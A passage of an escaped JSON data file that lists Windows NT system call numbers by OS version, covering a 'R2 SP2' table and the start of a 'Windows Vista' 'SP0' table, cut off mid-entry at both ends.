\"144\", \"NtDeleteValueKey\": \"145\", \"NtDisplayString\": \"146\", \"NtEnumerateBootEntries\": \"147\", \"NtEnumerateDriverEntries\": \"148\", \"NtEnumerateSystemEnvironmentValuesEx\": \"149\", \"NtExtendSection\": \"150\", \"NtFilterToken\": \"151\", \"NtFlushInstructionCache\": \"152\", \"NtFlushKey\": \"153\", \"NtFlushVirtualMemory\": \"154\", \"NtFlushWriteBuffer\": \"155\", \"NtFreeUserPhysicalPages\": \"156\", \"NtGetContextThread\": \"157\", \"NtGetCurrentProcessorNumber\": \"158\", \"NtGetDevicePowerState\": \"159\", \"NtGetPlugPlayEvent\": \"160\", \"NtGetWriteWatch\": \"161\", \"NtImpersonateAnonymousToken\": \"162\", \"NtImpersonateThread\": \"163\", \"NtInitializeRegistry\": \"164\", \"NtInitiatePowerAction\": \"165\", \"NtIsSystemResumeAutomatic\": \"166\", \"NtListenPort\": \"167\", \"NtLoadDriver\": \"168\", \"NtLoadKey\": \"169\", \"NtLoadKey2\": \"170\", \"NtLoadKeyEx\": \"171\", \"NtLockFile\": \"172\", \"NtLockProductActivationKeys\": \"173\", \"NtLockRegistryKey\": \"174\", \"NtLockVirtualMemory\": \"175\", \"NtMakePermanentObject\": \"176\", \"NtMakeTemporaryObject\": \"177\", \"NtMapUserPhysicalPages\": \"178\", \"NtModifyBootEntry\": \"179\", \"NtModifyDriverEntry\": \"180\", \"NtNotifyChangeDirectoryFile\": \"181\", \"NtNotifyChangeKey\": \"182\", \"NtNotifyChangeMultipleKeys\": \"183\", \"NtOpenEventPair\": \"184\", \"NtOpenIoCompletion\": \"185\", \"NtOpenJobObject\": \"186\", \"NtOpenKeyedEvent\": \"187\", \"NtOpenMutant\": \"188\", \"NtOpenObjectAuditAlarm\": \"189\", \"NtOpenProcessToken\": \"190\", \"NtOpenSemaphore\": \"191\", \"NtOpenSymbolicLinkObject\": \"192\", \"NtOpenThread\": \"193\", \"NtOpenTimer\": \"194\", \"NtPlugPlayControl\": \"195\", \"NtPrivilegeCheck\": \"196\", \"NtPrivilegeObjectAuditAlarm\": \"197\", \"NtPrivilegedServiceAuditAlarm\": \"198\", \"NtPulseEvent\": \"199\", \"NtQueryBootEntryOrder\": \"200\", \"NtQueryBootOptions\": \"201\", \"NtQueryDebugFilterState\": \"202\", \"NtQueryDirectoryObject\": \"203\", \"NtQueryDriverEntryOrder\": \"204\", \"NtQueryEaFile\": \"205\", \"NtQueryFullAttributesFile\": \"206\", \"NtQueryInformationAtom\": \"207\", \"NtQueryInformationJobObject\": \"208\", \"NtQueryInformationPort\": \"209\", \"NtQueryInstallUILanguage\": \"210\", \"NtQueryIntervalProfile\": \"211\", \"NtQueryIoCompletion\": \"212\", \"NtQueryMultipleValueKey\": \"213\", \"NtQueryMutant\": \"214\", \"NtQueryOpenSubKeys\": \"215\", \"NtQueryOpenSubKeysEx\": \"216\", \"NtQueryPortInformationProcess\": \"217\", \"NtQueryQuotaInformationFile\": \"218\", \"NtQuerySecurityObject\": \"219\", \"NtQuerySemaphore\": \"220\", \"NtQuerySymbolicLinkObject\": \"221\", \"NtQuerySystemEnvironmentValue\": \"222\", \"NtQuerySystemEnvironmentValueEx\": \"223\", \"NtQueryTimerResolution\": \"224\", \"NtRaiseException\": \"225\", \"NtRaiseHardError\": \"226\", \"NtRegisterThreadTerminatePort\": \"227\", \"NtReleaseKeyedEvent\": \"228\", \"NtRemoveProcessDebug\": \"229\", \"NtRenameKey\": \"230\", \"NtReplaceKey\": \"231\", \"NtReplyWaitReplyPort\": \"232\", \"NtRequestDeviceWakeup\": \"233\", \"NtRequestPort\": \"234\", \"NtRequestWakeupLatency\": \"235\", \"NtResetEvent\": \"236\", \"NtResetWriteWatch\": \"237\", \"NtRestoreKey\": \"238\", \"NtResumeProcess\": \"239\", \"NtSaveKey\": \"240\", \"NtSaveKeyEx\": \"241\", \"NtSaveMergedKeys\": \"242\", \"NtSecureConnectPort\": \"243\", \"NtSetBootEntryOrder\": \"244\", \"NtSetBootOptions\": \"245\", \"NtSetContextThread\": \"246\", \"NtSetDebugFilterState\": \"247\", \"NtSetDefaultHardErrorPort\": \"248\", \"NtSetDefaultLocale\": \"249\", \"NtSetDefaultUILanguage\": \"250\", \"NtSetDriverEntryOrder\": \"251\", \"NtSetEaFile\": \"252\", \"NtSetHighEventPair\": \"253\", \"NtSetHighWaitLowEventPair\": \"254\", \"NtSetInformationDebugObject\": \"255\", \"NtSetInformationJobObject\": \"256\", \"NtSetInformationKey\": \"257\", \"NtSetInformationToken\": \"258\", \"NtSetIntervalProfile\": \"259\", \"NtSetIoCompletion\": \"260\", \"NtSetLdtEntries\": \"261\", \"NtSetLowEventPair\": \"262\", \"NtSetLowWaitHighEventPair\": \"263\", \"NtSetQuotaInformationFile\": \"264\", \"NtSetSecurityObject\": \"265\", \"NtSetSystemEnvironmentValue\": \"266\", \"NtSetSystemEnvironmentValueEx\": \"267\", \"NtSetSystemInformation\": \"268\", \"NtSetSystemPowerState\": \"269\", \"NtSetSystemTime\": \"270\", \"NtSetThreadExecutionState\": \"271\", \"NtSetTimerResolution\": \"272\", \"NtSetUuidSeed\": \"273\", \"NtSetVolumeInformationFile\": \"274\", \"NtShutdownSystem\": \"275\", \"NtSignalAndWaitForSingleObject\": \"276\", \"NtStartProfile\": \"277\", \"NtStopProfile\": \"278\", \"NtSuspendProcess\": \"279\", \"NtSuspendThread\": \"280\", \"NtSystemDebugControl\": \"281\", \"NtTerminateJobObject\": \"282\", \"NtTestAlert\": \"283\", \"NtTranslateFilePath\": \"284\", \"NtUnloadDriver\": \"285\", \"NtUnloadKey\": \"286\", \"NtUnloadKey2\": \"287\", \"NtUnloadKeyEx\": \"288\", \"NtUnlockFile\": \"289\", \"NtUnlockVirtualMemory\": \"290\", \"NtVdmControl\": \"291\", \"NtWaitForDebugEvent\": \"292\", \"NtWaitForKeyedEvent\": \"293\", \"NtWaitHighEventPair\": \"294\", \"NtWaitLowEventPair\": \"295\"}, \"R2 SP2\": {\"NtMapUserPhysicalPagesScatter\": \"0\", \"NtWaitForSingleObject\": \"1\", \"NtCallbackReturn\": \"2\", \"NtReadFile\": \"3\", \"NtDeviceIoControlFile\": \"4\", \"NtWriteFile\": \"5\", \"NtRemoveIoCompletion\": \"6\", \"NtReleaseSemaphore\": \"7\", \"NtReplyWaitReceivePort\": \"8\", \"NtReplyPort\": \"9\", \"NtSetInformationThread\": \"10\", \"NtSetEvent\": \"11\", \"NtClose\": \"12\", \"NtQueryObject\": \"13\", \"NtQueryInformationFile\": \"14\", \"NtOpenKey\": \"15\", \"NtEnumerateValueKey\": \"16\", \"NtFindAtom\": \"17\", \"NtQueryDefaultLocale\": \"18\", \"NtQueryKey\": \"19\", \"NtQueryValueKey\": \"20\", \"NtAllocateVirtualMemory\": \"21\", \"NtQueryInformationProcess\": \"22\", \"NtWaitForMultipleObjects32\": \"23\", \"NtWriteFileGather\": \"24\", \"NtSetInformationProcess\": \"25\", \"NtCreateKey\": \"26\", \"NtFreeVirtualMemory\": \"27\", \"NtImpersonateClientOfPort\": \"28\", \"NtReleaseMutant\": \"29\", \"NtQueryInformationToken\": \"30\", \"NtRequestWaitReplyPort\": \"31\", \"NtQueryVirtualMemory\": \"32\", \"NtOpenThreadToken\": \"33\", \"NtQueryInformationThread\": \"34\", \"NtOpenProcess\": \"35\", \"NtSetInformationFile\": \"36\", \"NtMapViewOfSection\": \"37\", \"NtAccessCheckAndAuditAlarm\": \"38\", \"NtUnmapViewOfSection\": \"39\", \"NtReplyWaitReceivePortEx\": \"40\", \"NtTerminateProcess\": \"41\", \"NtSetEventBoostPriority\": \"42\", \"NtReadFileScatter\": \"43\", \"NtOpenThreadTokenEx\": \"44\", \"NtOpenProcessTokenEx\": \"45\", \"NtQueryPerformanceCounter\": \"46\", \"NtEnumerateKey\": \"47\", \"NtOpenFile\": \"48\", \"NtDelayExecution\": \"49\", \"NtQueryDirectoryFile\": \"50\", \"NtQuerySystemInformation\": \"51\", \"NtOpenSection\": \"52\", \"NtQueryTimer\": \"53\", \"NtFsControlFile\": \"54\", \"NtWriteVirtualMemory\": \"55\", \"NtCloseObjectAuditAlarm\": \"56\", \"NtDuplicateObject\": \"57\", \"NtQueryAttributesFile\": \"58\", \"NtClearEvent\": \"59\", \"NtReadVirtualMemory\": \"60\", \"NtOpenEvent\": \"61\", \"NtAdjustPrivilegesToken\": \"62\", \"NtDuplicateToken\": \"63\", \"NtContinue\": \"64\", \"NtQueryDefaultUILanguage\": \"65\", \"NtQueueApcThread\": \"66\", \"NtYieldExecution\": \"67\", \"NtAddAtom\": \"68\", \"NtCreateEvent\": \"69\", \"NtQueryVolumeInformationFile\": \"70\", \"NtCreateSection\": \"71\", \"NtFlushBuffersFile\": \"72\", \"NtApphelpCacheControl\": \"73\", \"NtCreateProcessEx\": \"74\", \"NtCreateThread\": \"75\", \"NtIsProcessInJob\": \"76\", \"NtProtectVirtualMemory\": \"77\", \"NtQuerySection\": \"78\", \"NtResumeThread\": \"79\", \"NtTerminateThread\": \"80\", \"NtReadRequestData\": \"81\", \"NtCreateFile\": \"82\", \"NtQueryEvent\": \"83\", \"NtWriteRequestData\": \"84\", \"NtOpenDirectoryObject\": \"85\", \"NtAccessCheckByTypeAndAuditAlarm\": \"86\", \"NtQuerySystemTime\": \"87\", \"NtWaitForMultipleObjects\": \"88\", \"NtSetInformationObject\": \"89\", \"NtCancelIoFile\": \"90\", \"NtTraceEvent\": \"91\", \"NtPowerInformation\": \"92\", \"NtSetValueKey\": \"93\", \"NtCancelTimer\": \"94\", \"NtSetTimer\": \"95\", \"NtAcceptConnectPort\": \"96\", \"NtAccessCheck\": \"97\", \"NtAccessCheckByType\": \"98\", \"NtAccessCheckByTypeResultList\": \"99\", \"NtAccessCheckByTypeResultListAndAuditAlarm\": \"100\", \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": \"101\", \"NtAddBootEntry\": \"102\", \"NtAddDriverEntry\": \"103\", \"NtAdjustGroupsToken\": \"104\", \"NtAlertResumeThread\": \"105\", \"NtAlertThread\": \"106\", \"NtAllocateLocallyUniqueId\": \"107\", \"NtAllocateUserPhysicalPages\": \"108\", \"NtAllocateUuids\": \"109\", \"NtAreMappedFilesTheSame\": \"110\", \"NtAssignProcessToJobObject\": \"111\", \"NtCancelDeviceWakeupRequest\": \"112\", \"NtCompactKeys\": \"113\", \"NtCompareTokens\": \"114\", \"NtCompleteConnectPort\": \"115\", \"NtCompressKey\": \"116\", \"NtConnectPort\": \"117\", \"NtCreateDebugObject\": \"118\", \"NtCreateDirectoryObject\": \"119\", \"NtCreateEventPair\": \"120\", \"NtCreateIoCompletion\": \"121\", \"NtCreateJobObject\": \"122\", \"NtCreateJobSet\": \"123\", \"NtCreateKeyedEvent\": \"124\", \"NtCreateMailslotFile\": \"125\", \"NtCreateMutant\": \"126\", \"NtCreateNamedPipeFile\": \"127\", \"NtCreatePagingFile\": \"128\", \"NtCreatePort\": \"129\", \"NtCreateProcess\": \"130\", \"NtCreateProfile\": \"131\", \"NtCreateSemaphore\": \"132\", \"NtCreateSymbolicLinkObject\": \"133\", \"NtCreateTimer\": \"134\", \"NtCreateToken\": \"135\", \"NtCreateWaitablePort\": \"136\", \"NtDebugActiveProcess\": \"137\", \"NtDebugContinue\": \"138\", \"NtDeleteAtom\": \"139\", \"NtDeleteBootEntry\": \"140\", \"NtDeleteDriverEntry\": \"141\", \"NtDeleteFile\": \"142\", \"NtDeleteKey\": \"143\", \"NtDeleteObjectAuditAlarm\": \"144\", \"NtDeleteValueKey\": \"145\", \"NtDisplayString\": \"146\", \"NtEnumerateBootEntries\": \"147\", \"NtEnumerateDriverEntries\": \"148\", \"NtEnumerateSystemEnvironmentValuesEx\": \"149\", \"NtExtendSection\": \"150\", \"NtFilterToken\": \"151\", \"NtFlushInstructionCache\": \"152\", \"NtFlushKey\": \"153\", \"NtFlushVirtualMemory\": \"154\", \"NtFlushWriteBuffer\": \"155\", \"NtFreeUserPhysicalPages\": \"156\", \"NtGetContextThread\": \"157\", \"NtGetCurrentProcessorNumber\": \"158\", \"NtGetDevicePowerState\": \"159\", \"NtGetPlugPlayEvent\": \"160\", \"NtGetWriteWatch\": \"161\", \"NtImpersonateAnonymousToken\": \"162\", \"NtImpersonateThread\": \"163\", \"NtInitializeRegistry\": \"164\", \"NtInitiatePowerAction\": \"165\", \"NtIsSystemResumeAutomatic\": \"166\", \"NtListenPort\": \"167\", \"NtLoadDriver\": \"168\", \"NtLoadKey\": \"169\", \"NtLoadKey2\": \"170\", \"NtLoadKeyEx\": \"171\", \"NtLockFile\": \"172\", \"NtLockProductActivationKeys\": \"173\", \"NtLockRegistryKey\": \"174\", \"NtLockVirtualMemory\": \"175\", \"NtMakePermanentObject\": \"176\", \"NtMakeTemporaryObject\": \"177\", \"NtMapUserPhysicalPages\": \"178\", \"NtModifyBootEntry\": \"179\", \"NtModifyDriverEntry\": \"180\", \"NtNotifyChangeDirectoryFile\": \"181\", \"NtNotifyChangeKey\": \"182\", \"NtNotifyChangeMultipleKeys\": \"183\", \"NtOpenEventPair\": \"184\", \"NtOpenIoCompletion\": \"185\", \"NtOpenJobObject\": \"186\", \"NtOpenKeyedEvent\": \"187\", \"NtOpenMutant\": \"188\", \"NtOpenObjectAuditAlarm\": \"189\", \"NtOpenProcessToken\": \"190\", \"NtOpenSemaphore\": \"191\", \"NtOpenSymbolicLinkObject\": \"192\", \"NtOpenThread\": \"193\", \"NtOpenTimer\": \"194\", \"NtPlugPlayControl\": \"195\", \"NtPrivilegeCheck\": \"196\", \"NtPrivilegeObjectAuditAlarm\": \"197\", \"NtPrivilegedServiceAuditAlarm\": \"198\", \"NtPulseEvent\": \"199\", \"NtQueryBootEntryOrder\": \"200\", \"NtQueryBootOptions\": \"201\", \"NtQueryDebugFilterState\": \"202\", \"NtQueryDirectoryObject\": \"203\", \"NtQueryDriverEntryOrder\": \"204\", \"NtQueryEaFile\": \"205\", \"NtQueryFullAttributesFile\": \"206\", \"NtQueryInformationAtom\": \"207\", \"NtQueryInformationJobObject\": \"208\", \"NtQueryInformationPort\": \"209\", \"NtQueryInstallUILanguage\": \"210\", \"NtQueryIntervalProfile\": \"211\", \"NtQueryIoCompletion\": \"212\", \"NtQueryMultipleValueKey\": \"213\", \"NtQueryMutant\": \"214\", \"NtQueryOpenSubKeys\": \"215\", \"NtQueryOpenSubKeysEx\": \"216\", \"NtQueryPortInformationProcess\": \"217\", \"NtQueryQuotaInformationFile\": \"218\", \"NtQuerySecurityObject\": \"219\", \"NtQuerySemaphore\": \"220\", \"NtQuerySymbolicLinkObject\": \"221\", \"NtQuerySystemEnvironmentValue\": \"222\", \"NtQuerySystemEnvironmentValueEx\": \"223\", \"NtQueryTimerResolution\": \"224\", \"NtRaiseException\": \"225\", \"NtRaiseHardError\": \"226\", \"NtRegisterThreadTerminatePort\": \"227\", \"NtReleaseKeyedEvent\": \"228\", \"NtRemoveProcessDebug\": \"229\", \"NtRenameKey\": \"230\", \"NtReplaceKey\": \"231\", \"NtReplyWaitReplyPort\": \"232\", \"NtRequestDeviceWakeup\": \"233\", \"NtRequestPort\": \"234\", \"NtRequestWakeupLatency\": \"235\", \"NtResetEvent\": \"236\", \"NtResetWriteWatch\": \"237\", \"NtRestoreKey\": \"238\", \"NtResumeProcess\": \"239\", \"NtSaveKey\": \"240\", \"NtSaveKeyEx\": \"241\", \"NtSaveMergedKeys\": \"242\", \"NtSecureConnectPort\": \"243\", \"NtSetBootEntryOrder\": \"244\", \"NtSetBootOptions\": \"245\", \"NtSetContextThread\": \"246\", \"NtSetDebugFilterState\": \"247\", \"NtSetDefaultHardErrorPort\": \"248\", \"NtSetDefaultLocale\": \"249\", \"NtSetDefaultUILanguage\": \"250\", \"NtSetDriverEntryOrder\": \"251\", \"NtSetEaFile\": \"252\", \"NtSetHighEventPair\": \"253\", \"NtSetHighWaitLowEventPair\": \"254\", \"NtSetInformationDebugObject\": \"255\", \"NtSetInformationJobObject\": \"256\", \"NtSetInformationKey\": \"257\", \"NtSetInformationToken\": \"258\", \"NtSetIntervalProfile\": \"259\", \"NtSetIoCompletion\": \"260\", \"NtSetLdtEntries\": \"261\", \"NtSetLowEventPair\": \"262\", \"NtSetLowWaitHighEventPair\": \"263\", \"NtSetQuotaInformationFile\": \"264\", \"NtSetSecurityObject\": \"265\", \"NtSetSystemEnvironmentValue\": \"266\", \"NtSetSystemEnvironmentValueEx\": \"267\", \"NtSetSystemInformation\": \"268\", \"NtSetSystemPowerState\": \"269\", \"NtSetSystemTime\": \"270\", \"NtSetThreadExecutionState\": \"271\", \"NtSetTimerResolution\": \"272\", \"NtSetUuidSeed\": \"273\", \"NtSetVolumeInformationFile\": \"274\", \"NtShutdownSystem\": \"275\", \"NtSignalAndWaitForSingleObject\": \"276\", \"NtStartProfile\": \"277\", \"NtStopProfile\": \"278\", \"NtSuspendProcess\": \"279\", \"NtSuspendThread\": \"280\", \"NtSystemDebugControl\": \"281\", \"NtTerminateJobObject\": \"282\", \"NtTestAlert\": \"283\", \"NtTranslateFilePath\": \"284\", \"NtUnloadDriver\": \"285\", \"NtUnloadKey\": \"286\", \"NtUnloadKey2\": \"287\", \"NtUnloadKeyEx\": \"288\", \"NtUnlockFile\": \"289\", \"NtUnlockVirtualMemory\": \"290\", \"NtVdmControl\": \"291\", \"NtWaitForDebugEvent\": \"292\", \"NtWaitForKeyedEvent\": \"293\", \"NtWaitHighEventPair\": \"294\", \"NtWaitLowEventPair\": \"295\"}}, \"Windows Vista\": {\"SP0\": {\"NtMapUserPhysicalPagesScatter\": \"0\", \"NtWaitForSingleObject\": \"1\", \"NtCallbackReturn\": \"2\", \"NtReadFile\": \"3\", \"NtDeviceIoControlFile\": \"4\", \"NtWriteFile\": \"5\", \"NtRemoveIoCompletion\": \"6\", \"NtReleaseSemaphore\": \"7\", \"NtReplyWaitReceivePort\": \"8\", \"NtReplyPort\": \"9\", \"NtSetInformationThread\": \"10\", \"NtSetEvent\": \"11\", \"NtClose\": \"12\", \"NtQueryObject\": \"13\", \"NtQueryInformationFile\": \"14\", \"NtOpenKey\": \"15\", \"NtEnumerateValueKey\": \"16\", \"NtFindAtom\": \"17\", \"NtQueryDefaultLocale\": \"18\", \"NtQueryKey\": \"19\", \"NtQueryValueKey\": \"20\", \"NtAllocateVirtualMemory\": \"21\", \"NtQueryInformationProcess\": \"22\", \"NtWaitForMultipleObjects32\": \"23\", \"NtWriteFileGather\": \"24\", \"NtSetInformationProcess\": \"25\", \"NtCreateKey\": \"26\", \"NtFreeVirtualMemory\": \"27\", \"NtImpersonateClientOfPort\": \"28\", \"NtReleaseMutant\": \"29\", \"NtQueryInformationToken\": \"30\", \"NtRequestWaitReplyPort\": \"31\", \"NtQueryVirtualMemory\": \"32\", \"NtOpenThreadToken\": \"33\", \"NtQueryInformationThread\": \"34\", \"NtOpenProcess\": \"35\", \"NtSetInformationFile\": \"36\", \"NtMapViewOfSection\": \"37\", \"NtAccessCheckAndAuditAlarm\": \"38\", \"NtUnmapViewOfSection\": \"39\", \"NtReplyWaitReceivePortEx\": \"40\", \"NtTerminateProcess\": \"41\", \"NtSetEventBoostPriority\": \"42\", \"NtReadFileScatter\": \"43\", \"NtOpenThreadTokenEx\": \"44\", \"NtOpenProcessTokenEx\": \"45\", \"NtQueryPerformanceCounter\": \"46\", \"NtEnumerateKey\": \"47\", \"NtOpenFile\": \"48\", \"NtDelayExecution\": \"49\", \"NtQueryDirectoryFile\": \"50\", \"NtQuerySystemInformation\": \"51\", \"NtOpenSection\": \"52\", \"NtQueryTimer\": \"53\", \"NtFsControlFile\": \"54\", \"NtWriteVirtualMemory\": \"55\", \"NtCloseObjectAuditAlarm\": \"56\", \"NtDuplicateObject\": \"57\", \"NtQueryAttributesFile\": \"58\", \"NtClearEvent\": \"59\", \"NtReadVirtualMemory\": \"60\", \"NtOpenEvent\": \"61\", \"NtAdjustPrivilegesToken\": \"62\", \"NtDuplicateToken\": \"63\", \"NtContinue\": \"64\", \"NtQueryDefaultUILanguage\": \"65\", \"NtQueueApcThread\": \"66\", \"NtYieldExecution\": \"67\", \"NtAddAtom\": \"68\", \"NtCreateEvent\": \"69\", \"NtQueryVolumeInformationFile\": \"70\", \"NtCreateSection\": \"71\", \"NtFlushBuffersFile\": \"72\", \"NtApphelpCacheControl\": \"73\", \"NtCreateProcessEx\": \"74\", \"NtCreateThread\": \"75\", \"NtIsProcessInJob\": \"76\", \"NtProtectVirtualMemory\": \"77\", \"NtQuerySection\": \"78\", \"NtResumeThread\": \"79\", \"NtTerminateThread\": \"80\", \"NtReadRequestData\": \"81\", \"NtCreateFile\": \"82\", \"NtQueryEvent\": \"83\", \"NtWriteRequestData\": \"84\", \"NtOpenDirectoryObject\": \"85\", \"NtAccessCheckByTypeAndAuditAlarm\": \"86\", \"NtQuerySystemTime\": \"87\", \"NtWaitForMultipleObjects\": \"88\", \"NtSetInformationObject\": \"89\", \"NtCancelIoFile\": \"90\", \"NtTraceEvent\": \"91\", \"NtPowerInformation\": \"92\", \"NtSetValueKey\": \"93\", \"NtCancelTimer\": \"94\", \"NtSetTimer\": \"95\", \"NtAcceptConnectPort\": \"96\", \"NtAccessCheck\": \"97\", \"NtAccessCheckByType\": \"98\", \"NtAccessCheckByTypeResultList\": \"99\", \"NtAccessCheckByTypeResultListAndAuditAlarm\": \"100\", \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": \"101\", \"NtAcquireCMFViewOwnership\": \"102\", \"NtAddBootEntry\": \"103\", \"NtAddDriverEntry\": \"104\", \"NtAdjustGroupsToken\": \"105\", \"NtAlertResumeThread\": \"106\", \"NtAlertThread\": \"107\", \"NtAllocateLocallyUniqueId\": \"108\", \"NtAllocateUserPhysicalPages\": \"109\", \"NtAllocateUuids\": \"110\", \"NtAlpcAcceptConnectPort\": \"111\", \"NtAlpcCancelMessage\": \"112\", \"NtAlpcConnectPort\": \"113\", \"NtAlpcCreatePort\": \"114\", \"NtAlpcCreatePortSection\": \"115\", \"NtAlpcCreateResourceReserve\": \"116\", \"NtAlpcCreateSectionView\": \"117\", \"NtAlpcCreateSecurityContext\": \"118\", \"NtAlpcDeletePortSection\": \"119\", \"NtAlpcDeleteResourceReserve\": \"120\", \"NtAlpcDeleteSectionView\": \"121\", \"NtAlpcDeleteSecurityContext\": \"122\", \"NtAlpcDisconnectPort\": \"123\", \"NtAlpcImpersonateClientOfPort\": \"124\", \"NtAlpcOpenSenderProcess\": \"125\", \"NtAlpcOpenSenderThread\": \"126\", \"NtAlpcQueryInformation\": \"127\", \"NtAlpcQueryInformationMessage\": \"128\", \"NtAlpcRevokeSecurityContext\": \"129\", \"NtAlpcSendWaitReceivePort\": \"130\", \"NtAlpcSetInformation\": \"131\", \"NtAreMappedFilesTheSame\": \"132\", \"NtAssignProcessToJobObject\": \"133\", \"NtCancelDeviceWakeupRequest\": \"134\", \"NtCancelIoFileEx\": \"135\", \"NtCancelSynchronousIoFile\": \"136\", \"NtClearAllSavepointsTransaction\": \"137\", \"NtClearSavepointTransaction\": \"138\", \"NtCommitComplete\": \"139\", \"NtCommitEnlistment\": \"140\", \"NtCommitTransaction\": \"141\", \"NtCompactKeys\": \"142\", \"NtCompareTokens\": \"143\", \"NtCompleteConnectPort\": \"144\", \"NtCompressKey\": \"145\", \"NtConnectPort\": \"146\", \"NtCreateDebugObject\": \"147\", \"NtCreateDirectoryObject\": \"148\", \"NtCreateEnlistment\": \"149\", \"NtCreateEventPair\": \"150\", \"NtCreateIoCompletion\": \"151\", \"NtCreateJobObject\": \"152\", \"NtCreateJobSet\": \"153\", \"NtCreateKeyTransacted\": \"154\", \"NtCreateKeyedEvent\": \"155\", \"NtCreateMailslotFile\": \"156\", \"NtCreateMutant\": \"157\", \"NtCreateNamedPipeFile\": \"158\", \"NtCreatePagingFile\": \"159\", \"NtCreatePort\": \"160\", \"NtCreatePrivateNamespace\": \"161\", \"NtCreateProcess\": \"162\", \"NtCreateProfile\": \"163\", \"NtCreateResourceManager\": \"164\", \"NtCreateSemaphore\": \"165\", \"NtCreateSymbolicLinkObject\": \"166\", \"NtCreateThreadEx\": \"167\", \"NtCreateTimer\": \"168\", \"NtCreateToken\": \"169\", \"NtCreateTransaction\": \"170\", \"NtCreateTransactionManager\": \"171\", \"NtCreateUserProcess\": \"172\", \"NtCreateWaitablePort\": \"173\", \"NtCreateWorkerFactory\": \"174\", \"NtDebugActiveProcess\": \"175\", \"NtDebugContinue\": \"176\", \"NtDeleteAtom\": \"177\", \"NtDeleteBootEntry\": \"178\", \"NtDeleteDriverEntry\": \"179\", \"NtDeleteFile\": \"180\", \"NtDeleteKey\": \"181\", \"NtDeleteObjectAuditAlarm\": \"182\", \"NtDeletePrivateNamespace\": \"183\", \"NtDeleteValueKey\": \"184\", \"NtDisplayString\": \"185\", \"NtEnumerateBootEntries\": \"186\", \"NtEnumerateDriverEntries\": \"187\", \"NtEnumerateSystemEnvironmentValuesEx\": \"188\", \"NtEnumerateTransactionObject\": \"189\", \"NtExtendSection\": \"190\", \"NtFilterToken\": \"191\", \"NtFlushInstallUILanguage\": \"192\", \"NtFlushInstructionCache\": \"193\", \"NtFlushKey\": \"194\", \"NtFlushProcessWriteBuffers\": \"195\", \"NtFlushVirtualMemory\": \"196\", \"NtFlushWriteBuffer\": \"197\", \"NtFreeUserPhysicalPages\": \"198\", \"NtFreezeRegistry\": \"199\", \"NtFreezeTransactions\": \"200\", \"NtGetContextThread\": \"201\", \"NtGetCurrentProcessorNumber\": \"202\", \"NtGetDevicePowerState\": \"203\", \"NtGetMUIRegistryInfo\": \"204\", \"NtGetNextProcess\": \"205\", \"NtGetNextThread\": \"206\", \"NtGetNlsSectionPtr\": \"207\", \"NtGetNotificationResourceManager\": \"208\", \"NtGetPlugPlayEvent\": \"209\", \"NtGetWriteWatch\": \"210\", \"NtImpersonateAnonymousToken\": \"211\", \"NtImpersonateThread\": \"212\", \"NtInitializeNlsFiles\": \"213\", \"NtInitializeRegistry\": \"214\", \"NtInitiatePowerAction\": \"215\", \"NtIsSystemResumeAutomatic\": \"216\", \"NtIsUILanguageComitted\": \"217\", \"NtListTransactions\": \"218\", \"NtListenPort\": \"219\", \"NtLoadDriver\": \"220\", \"NtLoadKey\": \"221\", \"NtLoadKey2\": \"222\", \"NtLoadKeyEx\": \"223\", \"NtLockFile\": \"224\", \"NtLockProductActivationKeys\": \"225\", \"NtLockRegistryKey\": \"226\", \"NtLockVirtualMemory\": \"227\", \"NtMakePermanentObject\": \"228\", \"NtMakeTemporaryObject\": \"229\", \"NtMapCMFModule\": \"230\", \"NtMapUserPhysicalPages\": \"231\", \"NtMarshallTransaction\": \"232\", \"NtModifyBootEntry\": \"233\", \"NtModifyDriverEntry\": \"234\", \"NtNotifyChangeDirectoryFile\": \"235\", \"NtNotifyChangeKey\": \"236\", \"NtNotifyChangeMultipleKeys\": \"237\", \"NtOpenEnlistment\": \"238\", \"NtOpenEventPair\": \"239\", \"NtOpenIoCompletion\": \"240\", \"NtOpenJobObject\": \"241\", \"NtOpenKeyTransacted\": \"242\", \"NtOpenKeyedEvent\": \"243\", \"NtOpenMutant\": \"244\", \"NtOpenObjectAuditAlarm\": \"245\", \"NtOpenPrivateNamespace\": \"246\", \"NtOpenProcessToken\": \"247\", \"NtOpenResourceManager\": \"248\", \"NtOpenSemaphore\": \"249\", \"NtOpenSession\": \"250\", \"NtOpenSymbolicLinkObject\": \"251\", \"NtOpenThread\": \"252\", \"NtOpenTimer\": \"253\", \"NtOpenTransaction\": \"254\", \"NtOpenTransactionManager\": \"255\", \"NtPlugPlayControl\": \"256\", \"NtPrePrepareComplete\": \"257\", \"NtPrePrepareEnlistment\": \"258\", \"NtPrepareComplete\": \"259\", \"NtPrepareEnlistment\": \"260\", \"NtPrivilegeCheck\": \"261\", \"NtPrivilegeObjectAuditAlarm\": \"262\", \"NtPrivilegedServiceAuditAlarm\": \"263\", \"NtPropagationComplete\": \"264\", \"NtPropagationFailed\": \"265\", \"NtPullTransaction\": \"266\", \"NtPulseEvent\": \"267\", \"NtQueryBootEntryOrder\": \"268\", \"NtQueryBootOptions\": \"269\", \"NtQueryDebugFilterState\": \"270\", \"NtQueryDirectoryObject\": \"271\", \"NtQueryDriverEntryOrder\": \"272\", \"NtQueryEaFile\": \"273\", \"NtQueryFullAttributesFile\": \"274\", \"NtQueryInformationAtom\": \"275\", \"NtQueryInformationEnlistment\": \"276\", \"NtQueryInformationJobObject\": \"277\", \"NtQueryInformationPort\": \"278\", \"NtQueryInformationResourceManager\": \"279\", \"NtQueryInformationTransaction\": \"280\", \"NtQueryInformationTransactionManager\": \"281\", \"NtQueryInformationWorkerFactory\": \"282\", \"NtQueryInstallUILanguage\": \"283\", \"NtQueryIntervalProfile\": \"284\", \"NtQueryIoCompletion\": \"285\", \"NtQueryLicenseValue\": \"286\", \"NtQueryMultipleValueKey\": \"287\", \"NtQueryMutant\": \"288\", \"NtQueryOpenSubKeys\": \"289\", \"NtQueryOpenSubKeysEx\": \"290\", \"NtQueryPortInformationProcess\": \"291\", \"NtQueryQuotaInformationFile\": \"292\", \"NtQuerySecurityObject\": \"293\", \"NtQuerySemaphore\": \"294\", \"NtQuerySymbolicLinkObject\": \"295\", \"NtQuerySystemEnvironmentValue\": \"296\", \"NtQuerySystemEnvironmentValueEx\": \"297\", \"NtQueryTimerResolution\": \"298\", \"NtRaiseException\": \"299\", \"NtRaiseHardError\": \"300\", \"NtReadOnlyEnlistment\": \"301\", \"NtRecoverEnlistment\": \"302\", \"NtRecoverResourceManager\": \"303\", \"NtRecoverTransactionManager\": \"304\", \"NtRegisterProtocolAddressInformation\": \"305\", 